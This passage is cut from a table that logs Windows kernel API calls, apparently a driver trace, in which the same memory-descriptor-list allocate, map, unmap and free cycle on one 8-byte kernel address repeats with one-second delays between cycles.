| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b0c6560, MemoryDescriptorList_unk = 0xffffe000487ed580 |
| IoFreeMdl | Mdl_unk = 0xffffe000487ed580 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003a4ae280 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003a4ae280, MemoryDescriptorList_unk_out = 0xffffe0003a4ae280 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003a4ae280, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002b0ea560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b0ea560, MemoryDescriptorList_unk = 0xffffe0003a4ae280 |
| IoFreeMdl | Mdl_unk = 0xffffe0003a4ae280 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bd5e400 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bd5e400, MemoryDescriptorList_unk_out = 0xffffe0003bd5e400 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bd5e400, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002b1d6560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b1d6560, MemoryDescriptorList_unk = 0xffffe0003bd5e400 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bd5e400 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bd5e400 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bd5e400, MemoryDescriptorList_unk_out = 0xffffe0003bd5e400 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bd5e400, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002b1d8560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b1d8560, MemoryDescriptorList_unk = 0xffffe0003bd5e400 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bd5e400 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bd5e400 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bd5e400, MemoryDescriptorList_unk_out = 0xffffe0003bd5e400 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bd5e400, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002b1dd560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b1dd560, MemoryDescriptorList_unk = 0xffffe0003bd5e400 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bd5e400 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bd5e400 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bd5e400, MemoryDescriptorList_unk_out = 0xffffe0003bd5e400 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bd5e400, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002b1ed560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b1ed560, MemoryDescriptorList_unk = 0xffffe0003bd5e400 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bd5e400 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bd5e400 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bd5e400, MemoryDescriptorList_unk_out = 0xffffe0003bd5e400 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bd5e400, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002b5ad560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b5ad560, MemoryDescriptorList_unk = 0xffffe0003bd5e400 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bd5e400 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bd5e400 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bd5e400, MemoryDescriptorList_unk_out = 0xffffe0003bd5e400 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bd5e400, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002b5bc560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b5bc560, MemoryDescriptorList_unk = 0xffffe0003bd5e400 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bd5e400 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bd5e400, MemoryDescriptorList_unk_out = 0xffffe0003bd5e400 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bd5e400, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002b5bf560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b5bf560, MemoryDescriptorList_unk = 0xffffe0003bd5e400 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bd5e400 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1a2170 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1a2170, MemoryDescriptorList_unk_out = 0xffffe0003c1a2170 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1a2170, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002b698560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b698560, MemoryDescriptorList_unk = 0xffffe0003c1a2170 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1a2170 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1a2170 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1a2170, MemoryDescriptorList_unk_out = 0xffffe0003c1a2170 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1a2170, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002b69c560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b69c560, MemoryDescriptorList_unk = 0xffffe0003c1a2170 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1a2170 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1a2170 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1a2170, MemoryDescriptorList_unk_out = 0xffffe0003c1a2170 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1a2170, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002b8a4560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b8a4560, MemoryDescriptorList_unk = 0xffffe0003c1a2170 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1a2170 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1a2170 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1a2170, MemoryDescriptorList_unk_out = 0xffffe0003c1a2170 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1a2170, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002b8ad560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b8ad560, MemoryDescriptorList_unk = 0xffffe0003c1a2170 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1a2170 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1a2170 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1a2170, MemoryDescriptorList_unk_out = 0xffffe0003c1a2170 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1a2170, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002b8b0560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b8b0560, MemoryDescriptorList_unk = 0xffffe0003c1a2170 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1a2170 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1fc4c0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1fc4c0, MemoryDescriptorList_unk_out = 0xffffe0003c1fc4c0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1fc4c0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002b8c8560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b8c8560, MemoryDescriptorList_unk = 0xffffe0003c1fc4c0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1fc4c0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9bd520 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9bd520, MemoryDescriptorList_unk_out = 0xffffe0003b9bd520 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9bd520, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002ba33560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002ba33560, MemoryDescriptorList_unk = 0xffffe0003b9bd520 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9bd520 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b491560 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b491560, MemoryDescriptorList_unk_out = 0xffffe0003b491560 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b491560, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002be49560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002be49560, MemoryDescriptorList_unk = 0xffffe0003b491560 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b491560 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003f9b4870 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003f9b4870, MemoryDescriptorList_unk_out = 0xffffe0003f9b4870 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003f9b4870, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002be54560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002be54560, MemoryDescriptorList_unk = 0xffffe0003f9b4870 |
| IoFreeMdl | Mdl_unk = 0xffffe0003f9b4870 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bcd4b60 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bcd4b60, MemoryDescriptorList_unk_out = 0xffffe0003bcd4b60 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bcd4b60, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002be83560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002be83560, MemoryDescriptorList_unk = 0xffffe0003bcd4b60 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bcd4b60 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bcd4b60 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bcd4b60, MemoryDescriptorList_unk_out = 0xffffe0003bcd4b60 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bcd4b60, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002be96560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002be96560, MemoryDescriptorList_unk = 0xffffe0003bcd4b60 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bcd4b60 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c0f7930 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c0f7930, MemoryDescriptorList_unk_out = 0xffffe0003c0f7930 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c0f7930, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002be98560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002be98560, MemoryDescriptorList_unk = 0xffffe0003c0f7930 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c0f7930 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c5ee960 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c5ee960, MemoryDescriptorList_unk_out = 0xffffe0003c5ee960 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c5ee960, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002bfb1560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002bfb1560, MemoryDescriptorList_unk = 0xffffe0003c5ee960 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c5ee960 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1f8680 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1f8680, MemoryDescriptorList_unk_out = 0xffffe0003c1f8680 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1f8680, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002bfb5560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002bfb5560, MemoryDescriptorList_unk = 0xffffe0003c1f8680 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1f8680 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1f8680 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1f8680, MemoryDescriptorList_unk_out = 0xffffe0003c1f8680 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1f8680, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002bfb7560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002bfb7560, MemoryDescriptorList_unk = 0xffffe0003c1f8680 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1f8680 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1f8680 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1f8680, MemoryDescriptorList_unk_out = 0xffffe0003c1f8680 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1f8680, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002bfc2560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002bfc2560, MemoryDescriptorList_unk = 0xffffe0003c1f8680 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1f8680 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1f8680 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1f8680, MemoryDescriptorList_unk_out = 0xffffe0003c1f8680 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1f8680, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002c01c560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c01c560, MemoryDescriptorList_unk = 0xffffe0003c1f8680 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1f8680 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1f8680 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1f8680, MemoryDescriptorList_unk_out = 0xffffe0003c1f8680 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1f8680, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002c2a5560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c2a5560, MemoryDescriptorList_unk = 0xffffe0003c1f8680 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1f8680 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae54160 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae54160, MemoryDescriptorList_unk_out = 0xffffe0003ae54160 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae54160, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002c2b2560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c2b2560, MemoryDescriptorList_unk = 0xffffe0003ae54160 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae54160 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000461f8890 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000461f8890, MemoryDescriptorList_unk_out = 0xffffe000461f8890 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000461f8890, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002c2b4560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c2b4560, MemoryDescriptorList_unk = 0xffffe000461f8890 |
| IoFreeMdl | Mdl_unk = 0xffffe000461f8890 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
